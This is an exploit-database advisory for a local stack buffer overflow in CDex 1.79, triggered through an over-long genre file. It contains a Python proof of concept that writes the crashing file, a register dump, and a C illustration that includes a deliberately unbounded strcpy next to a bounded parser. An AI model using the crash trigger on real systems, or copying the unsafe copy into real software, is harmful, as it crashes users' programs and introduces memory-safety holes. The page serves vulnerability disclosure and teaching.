CDex Genre 1.79 – Local Stack Buffer Overflow

  • Author: Un_N0n
    Date: 2015-10-13
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/38452/
  • '''
    ********************************************************************************************
    # Exploit Title: CDex Genre Stack Buffer Overflow
    # Date: 10/9/2015
    # Exploit Author: Un_N0n
    # Software Link: http://cdex.mu/download
    # Version: 1.79
    # Tested on: Windows 7 x86(32 BIT)
    ********************************************************************************************
    [Steps to Produce the Crash]:
    1- Generate the malformed CDexGenres.txt with the Python code below.
    2- Go to C:\Users\YourUsername\AppData\Local\CDex\LocalCDDB
    3- Replace the existing CDexGenres.txt with the one produced by the Python code.
    4- Open CDex.exe.
    ~The software crashes while loading the genre list at startup.
    
    On further analysis this turns out to be a stack-based buffer overflow: the over-long genre line overruns a fixed-size stack buffer. The register dump shows the process being torn down with STATUS_STACK_BUFFER_OVERRUN, the status raised when the MSVC /GS stack-cookie check fails, so EIP sitting in kernel32 is the fail-fast handler, not an attacker-controlled address.
    
    [REG-DUMP]:
    EAX 00000000
    ECX 779DD018 ASCII "\r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n" // /GS cookie-check failure: the exception is reported, but the process is terminated anyway.
    EDX 0012F1A1 ASCII 0A,"STATUS_STA"
    EBX 00749338 CDex.00749338
    ESP 0012F3E8
    EBP 0012F464
    ESI 00000000
    EDI 002C7AC8
    
    EIP 779DCE96 kernel32.779DCE96
    
    0012F3F4 002C7AC8
    0012F3F8 002E25F8  ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
    0012F3FC 002E5FD8
    0012F400 002E44A0
    0012F404 000003F8
    0012F408 0000007F
    0012F40C 0012F504
    0012F410 00260000
    0012F414 77C97B89  RETURN to ntdll.77C97B89 from ntdll.RtlFillMemoryUlong
    0012F418 002E2580  ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
    0012F41C 00001190
    '''
    
    # [Code to produce CDexGenres.txt]
    # Writes one 66666-byte line of "A" in place of the genre list; this is the
    # file that triggers the crash when CDex parses it at startup.
    buffer = "A" * 66666
    file = "CDexGenres.txt"
    with open(file, "w") as f:
        f.write(buffer)
    '''
    **********************************************************************************************
    '''
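The following C is an added illustration of the bug class behind this crash, not CDex's own code (the page shows no CDex source): an unbounded copy of a file line into a fixed-size stack buffer, beside a bounded parser that rejects over-long genre records instead of truncating them. The record size GENRE_MAX, the function names and the sample file contents are assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical fixed-size genre record; the real size in CDex is not on the
 * page and is assumed here only to make the overrun concrete. */
#define GENRE_MAX 128

/* Vulnerable pattern: unbounded copy of one file line into a fixed stack
 * buffer. A 66666-byte line overruns the frame; on an MSVC /GS build the
 * cookie check fails and the process dies with STATUS_STACK_BUFFER_OVERRUN,
 * the crash signature seen in the register dump above. Illustrative only;
 * never feed it untrusted input. */
size_t genre_copy_unsafe(const char *line)
{
    char genre[GENRE_MAX];
    strcpy(genre, line);              /* no length check */
    return strlen(genre);
}

/* Hardened copy: a record that does not fit is rejected rather than silently
 * truncated, so a malformed file is reported instead of masked.
 * Returns the record length, or -1 when len >= outsz. */
int genre_copy_safe(const char *p, size_t len, char *out, size_t outsz)
{
    if (len >= outsz)
        return -1;
    memcpy(out, p, len);
    out[len] = '\0';
    return (int)len;
}

/* Check a single NUL-terminated line against the record limit. */
int check_record(const char *line)
{
    char rec[GENRE_MAX];
    return genre_copy_safe(line, strlen(line), rec, sizeof rec);
}

/* Parse an in-memory CDexGenres.txt: one genre per line, LF or CRLF.
 * Returns the number of non-empty records, or -1 at the first over-long
 * line (the PoC file is a single 66666-byte line and is rejected). */
int count_genres(const char *data)
{
    char rec[GENRE_MAX];
    int count = 0;
    const char *p = data;

    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        if (len > 0 && p[len - 1] == '\r')
            len--;                      /* strip CR of a CRLF ending */
        if (genre_copy_safe(p, len, rec, sizeof rec) < 0)
            return -1;                  /* refuse the whole file */
        if (len > 0)
            count++;
        if (nl == NULL)
            break;
        p = nl + 1;
    }
    return count;
}

/* Build the same payload the Python PoC writes: n bytes of 'A'
 * (constructed sample input, heap-allocated; caller frees). */
char *poc_buffer(size_t n)
{
    char *buf = malloc(n + 1);
    if (buf == NULL)
        return NULL;
    memset(buf, 'A', n);
    buf[n] = '\0';
    return buf;
}

int main(void)
{
    /* Constructed sample file contents, not taken from a real CDex install. */
    const char *sample = "Blues\r\nClassic Rock\r\nCountry\r\n";
    char *poc = poc_buffer(66666);

    printf("sample records: %d\n", count_genres(sample));
    printf("poc records:    %d\n", count_genres(poc));
    free(poc);
    return 0;
}
```

The bounded parser fails closed: any line of GENRE_MAX bytes or more makes count_genres return -1, so the PoC file is rejected before anything is copied onto the stack. The unsafe routine is kept only to show where the /GS cookie check would fire; a real fix replaces the copy, it does not rely on the cookie to catch the overrun.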